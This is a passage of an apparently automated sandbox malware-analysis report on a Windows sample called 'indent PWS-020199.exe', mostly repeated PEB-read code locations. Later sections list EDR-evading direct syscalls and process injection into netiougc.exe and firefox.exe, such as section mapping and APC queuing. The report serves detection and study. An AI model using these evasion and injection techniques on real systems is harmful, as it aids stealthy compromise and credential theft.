            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C2840 mov ecx, dword ptr fs:[00000030h]2_2_014C2840
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B4859 mov eax, dword ptr fs:[00000030h]2_2_014B4859
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B4859 mov eax, dword ptr fs:[00000030h]2_2_014B4859
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E0854 mov eax, dword ptr fs:[00000030h]2_2_014E0854
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153E872 mov eax, dword ptr fs:[00000030h]2_2_0153E872
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153E872 mov eax, dword ptr fs:[00000030h]2_2_0153E872
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01546870 mov eax, dword ptr fs:[00000030h]2_2_01546870
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01546870 mov eax, dword ptr fs:[00000030h]2_2_01546870
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153C810 mov eax, dword ptr fs:[00000030h]2_2_0153C810
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155483A mov eax, dword ptr fs:[00000030h]2_2_0155483A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155483A mov eax, dword ptr fs:[00000030h]2_2_0155483A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D2835 mov eax, dword ptr fs:[00000030h]2_2_014D2835
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D2835 mov eax, dword ptr fs:[00000030h]2_2_014D2835
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D2835 mov eax, dword ptr fs:[00000030h]2_2_014D2835
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D2835 mov ecx, dword ptr fs:[00000030h]2_2_014D2835
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D2835 mov eax, dword ptr fs:[00000030h]2_2_014D2835
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D2835 mov eax, dword ptr fs:[00000030h]2_2_014D2835
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA830 mov eax, dword ptr fs:[00000030h]2_2_014EA830
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE8C0 mov eax, dword ptr fs:[00000030h]2_2_014DE8C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015808C0 mov eax, dword ptr fs:[00000030h]2_2_015808C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157A8E4 mov eax, dword ptr fs:[00000030h]2_2_0157A8E4
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC8F9 mov eax, dword ptr fs:[00000030h]2_2_014EC8F9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC8F9 mov eax, dword ptr fs:[00000030h]2_2_014EC8F9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B0887 mov eax, dword ptr fs:[00000030h]2_2_014B0887
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153C89D mov eax, dword ptr fs:[00000030h]2_2_0153C89D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155EB50 mov eax, dword ptr fs:[00000030h]2_2_0155EB50
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01582B57 mov eax, dword ptr fs:[00000030h]2_2_01582B57
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01582B57 mov eax, dword ptr fs:[00000030h]2_2_01582B57
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01582B57 mov eax, dword ptr fs:[00000030h]2_2_01582B57
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01582B57 mov eax, dword ptr fs:[00000030h]2_2_01582B57
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01546B40 mov eax, dword ptr fs:[00000030h]2_2_01546B40
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01546B40 mov eax, dword ptr fs:[00000030h]2_2_01546B40
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157AB40 mov eax, dword ptr fs:[00000030h]2_2_0157AB40
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01558B42 mov eax, dword ptr fs:[00000030h]2_2_01558B42
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A8B50 mov eax, dword ptr fs:[00000030h]2_2_014A8B50
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01564B4B mov eax, dword ptr fs:[00000030h]2_2_01564B4B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01564B4B mov eax, dword ptr fs:[00000030h]2_2_01564B4B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014ACB7E mov eax, dword ptr fs:[00000030h]2_2_014ACB7E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152EB1D mov eax, dword ptr fs:[00000030h]2_2_0152EB1D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152EB1D mov eax, dword ptr fs:[00000030h]2_2_0152EB1D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152EB1D mov eax, dword ptr fs:[00000030h]2_2_0152EB1D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152EB1D mov eax, dword ptr fs:[00000030h]2_2_0152EB1D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152EB1D mov eax, dword ptr fs:[00000030h]2_2_0152EB1D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152EB1D mov eax, dword ptr fs:[00000030h]2_2_0152EB1D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152EB1D mov eax, dword ptr fs:[00000030h]2_2_0152EB1D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152EB1D mov eax, dword ptr fs:[00000030h]2_2_0152EB1D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152EB1D mov eax, dword ptr fs:[00000030h]2_2_0152EB1D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584B00 mov eax, dword ptr fs:[00000030h]2_2_01584B00
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DEB20 mov eax, dword ptr fs:[00000030h]2_2_014DEB20
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DEB20 mov eax, dword ptr fs:[00000030h]2_2_014DEB20
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01578B28 mov eax, dword ptr fs:[00000030h]2_2_01578B28
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01578B28 mov eax, dword ptr fs:[00000030h]2_2_01578B28
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155EBD0 mov eax, dword ptr fs:[00000030h]2_2_0155EBD0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B0BCD mov eax, dword ptr fs:[00000030h]2_2_014B0BCD
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B0BCD mov eax, dword ptr fs:[00000030h]2_2_014B0BCD
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B0BCD mov eax, dword ptr fs:[00000030h]2_2_014B0BCD
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D0BCB mov eax, dword ptr fs:[00000030h]2_2_014D0BCB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D0BCB mov eax, dword ptr fs:[00000030h]2_2_014D0BCB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D0BCB mov eax, dword ptr fs:[00000030h]2_2_014D0BCB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153CBF0 mov eax, dword ptr fs:[00000030h]2_2_0153CBF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DEBFC mov eax, dword ptr fs:[00000030h]2_2_014DEBFC
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B8BF0 mov eax, dword ptr fs:[00000030h]2_2_014B8BF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B8BF0 mov eax, dword ptr fs:[00000030h]2_2_014B8BF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B8BF0 mov eax, dword ptr fs:[00000030h]2_2_014B8BF0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01564BB0 mov eax, dword ptr fs:[00000030h]2_2_01564BB0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01564BB0 mov eax, dword ptr fs:[00000030h]2_2_01564BB0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0BBE mov eax, dword ptr fs:[00000030h]2_2_014C0BBE
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0BBE mov eax, dword ptr fs:[00000030h]2_2_014C0BBE
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0A5B mov eax, dword ptr fs:[00000030h]2_2_014C0A5B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0A5B mov eax, dword ptr fs:[00000030h]2_2_014C0A5B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B6A50 mov eax, dword ptr fs:[00000030h]2_2_014B6A50
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B6A50 mov eax, dword ptr fs:[00000030h]2_2_014B6A50
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B6A50 mov eax, dword ptr fs:[00000030h]2_2_014B6A50
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B6A50 mov eax, dword ptr fs:[00000030h]2_2_014B6A50
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B6A50 mov eax, dword ptr fs:[00000030h]2_2_014B6A50
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B6A50 mov eax, dword ptr fs:[00000030h]2_2_014B6A50
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B6A50 mov eax, dword ptr fs:[00000030h]2_2_014B6A50
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152CA72 mov eax, dword ptr fs:[00000030h]2_2_0152CA72
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152CA72 mov eax, dword ptr fs:[00000030h]2_2_0152CA72
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014ECA6F mov eax, dword ptr fs:[00000030h]2_2_014ECA6F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014ECA6F mov eax, dword ptr fs:[00000030h]2_2_014ECA6F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014ECA6F mov eax, dword ptr fs:[00000030h]2_2_014ECA6F
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155EA60 mov eax, dword ptr fs:[00000030h]2_2_0155EA60
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153CA11 mov eax, dword ptr fs:[00000030h]2_2_0153CA11
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DEA2E mov eax, dword ptr fs:[00000030h]2_2_014DEA2E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014ECA24 mov eax, dword ptr fs:[00000030h]2_2_014ECA24
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D4A35 mov eax, dword ptr fs:[00000030h]2_2_014D4A35
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D4A35 mov eax, dword ptr fs:[00000030h]2_2_014D4A35
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B0AD0 mov eax, dword ptr fs:[00000030h]2_2_014B0AD0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01506ACC mov eax, dword ptr fs:[00000030h]2_2_01506ACC
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01506ACC mov eax, dword ptr fs:[00000030h]2_2_01506ACC
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01506ACC mov eax, dword ptr fs:[00000030h]2_2_01506ACC
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E4AD0 mov eax, dword ptr fs:[00000030h]2_2_014E4AD0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E4AD0 mov eax, dword ptr fs:[00000030h]2_2_014E4AD0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EAAEE mov eax, dword ptr fs:[00000030h]2_2_014EAAEE
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EAAEE mov eax, dword ptr fs:[00000030h]2_2_014EAAEE
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BEA80 mov eax, dword ptr fs:[00000030h]2_2_014BEA80
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BEA80 mov eax, dword ptr fs:[00000030h]2_2_014BEA80
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BEA80 mov eax, dword ptr fs:[00000030h]2_2_014BEA80
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BEA80 mov eax, dword ptr fs:[00000030h]2_2_014BEA80
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BEA80 mov eax, dword ptr fs:[00000030h]2_2_014BEA80
            Source: C:\Users\user\Desktop\indent PWS-020199.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\indent PWS-020199.exeMemory written: C:\Users\user\Desktop\indent PWS-020199.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: NULL target: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: NULL target: C:\Windows\SysWOW64\netiougc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: NULL target: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: NULL target: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netiougc.exeThread register set: target process: 7220Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netiougc.exeThread APC queued: target process: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess created: C:\Users\user\Desktop\indent PWS-020199.exe "C:\Users\user\Desktop\indent PWS-020199.exe"Jump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeProcess created: C:\Windows\SysWOW64\netiougc.exe "C:\Windows\SysWOW64\netiougc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000002.2905275049.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897890801.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905634334.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000002.2905275049.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897890801.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905634334.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000002.2905275049.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897890801.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905634334.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000002.2905275049.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897890801.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905634334.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Users\user\Desktop\indent PWS-020199.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
